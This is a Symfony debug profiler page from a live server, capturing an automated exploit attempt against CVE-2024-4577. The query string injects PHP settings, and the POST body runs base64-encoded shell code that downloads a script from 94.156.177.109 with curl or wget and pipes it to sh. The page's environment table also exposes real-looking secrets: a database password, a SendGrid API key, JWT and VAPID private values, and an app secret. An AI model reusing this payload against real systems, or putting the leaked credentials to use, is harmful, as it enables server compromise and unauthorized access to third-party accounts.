CatchAllController :: index
Request
GET Parameters
Key | Value |
---|---|
�d_allow_url_include=1_�d_auto_prepend_file=php://input | "" |
POST Parameters
Key | Value |
---|---|
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA | "=")); echo(md5("Hello CVE-2024-4577")); ?>" |
Uploaded Files
No files were uploaded
Request Attributes
Key | Value |
---|---|
_controller | "App\Controller\CatchAllController::index" |
_firewall_context | "security.firewall.map.context.main" |
_route | "catch_all" |
_route_params |
|
_security_firewall_run | "_security_main" |
_stopwatch_token | "d3099e" |
catchall | null |
id | "hello.world" |
platform | "beastscan" |
Request Headers
Header | Value |
---|---|
accept | "*/*" |
connection | "keep-alive" |
content-length | "225" |
content-type | "application/x-www-form-urlencoded" |
host | "49.12.205.23:80" |
upgrade-insecure-requests | "1" |
user-agent | "Custom-AsyncHttpClient" |
x-php-ob-level | "1" |
Request Content
Raw
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>
Response
Response Headers
Header | Value |
---|---|
cache-control | "no-cache, private" |
content-type | "text/html; charset=utf-8" |
date | "Fri, 14 Mar 2025 12:14:55 GMT" |
location | "https://www.beastscan.com" |
x-debug-token | "259a16" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session 7
Session Metadata
Key | Value |
---|---|
Created | "Fri, 14 Mar 25 12:14:55 +0000" |
Last used | "Fri, 14 Mar 25 12:14:55 +0000" |
Lifetime | 0 |
Session Attributes
No session attributes
Session Usage
7
Usages
Stateless check enabled
Usage |
---|
App\EventSubscriber\RequestSubscriber:22
|
Symfony\Component\Security\Core\Authentication\Token\Storage\UsageTrackingTokenStorage:41
|
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:69
|
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:70
|
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:71
|
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:72
|
Symfony\Component\HttpKernel\DataCollector\RequestDataCollector:73
|
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
Key | Value |
---|---|
APP_ENV | "dev" |
APP_SECRET | "d55680938ae162e2a3284a6769f91abb" |
CORS_ALLOW_ORIGIN | "^https?://(app.beastscan.com|localhost|127\.0\.0\.1)(:[0-9]+)?$" |
DATABASE_URL | "mysql://beastscan:wevV635hHfRI@195.201.4.67/promo?serverVersion=10.11.6-MariaDB" |
GOOGLE_MAPS_API | "AIzaSyCx5gZKPKDRZ7gQ3Yfr0X_kw5_Y3WyfDSU" |
JWT_PASSPHRASE | "1f69ffaaa336c2a86e5473927f5da3723c684edff5ec2854afc0d8fcf023fdc5" |
JWT_PUBLIC_KEY | "%kernel.project_dir%/config/jwt/public.pem" |
JWT_SECRET_KEY | "%kernel.project_dir%/config/jwt/private.pem" |
KEYFILE | "/var/www/html/hosted.beastscan.com/config/client.json" |
LOCK_DSN | "flock" |
MAILER_DSN | "sendgrid+smtp://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@default" |
MESSENGER_TRANSPORT_DSN | "doctrine://default?auto_setup=0" |
QRBUILDER | "http://my.beastscan.com:5000" |
QRHOST | "https://bstco.de" |
SENTRY_DSN | "https://4324f2aeb4854ed7914b380fce2e912c@o44870.ingest.sentry.io/6654681" |
VAPID_PRIVATE_KEY | "t6mP0L6inHtlY5_wrdEpD6xkf-S450SHRb4LCWNHap0" |
VAPID_PUBLIC_KEY | "BK3Yzsy9nKyf0ryrWiml4eBjGpVDX1qhz3H45M_-YvxFsTu9CTTNsZGSUkAv5q4kh1viuuHv5tc5kAAcTNUYViA" |
Defined as regular env variables
Key | Value |
---|---|
APP_DEBUG | "1" |
CONTENT_LENGTH | "225" |
CONTENT_TYPE | "application/x-www-form-urlencoded" |
CONTEXT_DOCUMENT_ROOT | "/var/www/html/hosted.beastscan.com/public" |
CONTEXT_PREFIX | "" |
DOCUMENT_ROOT | "/var/www/html/hosted.beastscan.com/public" |
GATEWAY_INTERFACE | "CGI/1.1" |
HTTP_ACCEPT | "*/*" |
HTTP_CONNECTION | "keep-alive" |
HTTP_HOST | "49.12.205.23:80" |
HTTP_UPGRADE_INSECURE_REQUESTS | "1" |
HTTP_USER_AGENT | "Custom-AsyncHttpClient" |
PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" |
PHP_SELF | "/index.php" |
QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_QUERY_STRING | "%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
REDIRECT_STATUS | "200" |
REDIRECT_URL | "/hello.world" |
REMOTE_ADDR | "223.26.61.229" |
REMOTE_PORT | "35968" |
REQUEST_METHOD | "POST" |
REQUEST_SCHEME | "http" |
REQUEST_TIME | 1741954495 |
REQUEST_TIME_FLOAT | 1741954495.1275 |
REQUEST_URI | "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" |
SCRIPT_FILENAME | "/var/www/html/hosted.beastscan.com/public/index.php" |
SCRIPT_NAME | "/index.php" |
SERVER_ADDR | "49.12.205.23" |
SERVER_ADMIN | "webmaster@localhost" |
SERVER_NAME | "49.12.205.23" |
SERVER_PORT | "80" |
SERVER_PROTOCOL | "HTTP/1.1" |
SERVER_SIGNATURE | "<address>Apache/2.4.59 (Debian) Server at 49.12.205.23 Port 80</address>\n" |
SERVER_SOFTWARE | "Apache/2.4.59 (Debian)" |
SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL,MAILER_DSN,SENTRY_DSN,LOCK_DSN,QRHOST,QRBUILDER,KEYFILE,JWT_SECRET_KEY,JWT_PUBLIC_KEY,JWT_PASSPHRASE,CORS_ALLOW_ORIGIN,GOOGLE_MAPS_API,MESSENGER_TRANSPORT_DSN,VAPID_PUBLIC_KEY,VAPID_PRIVATE_KEY" |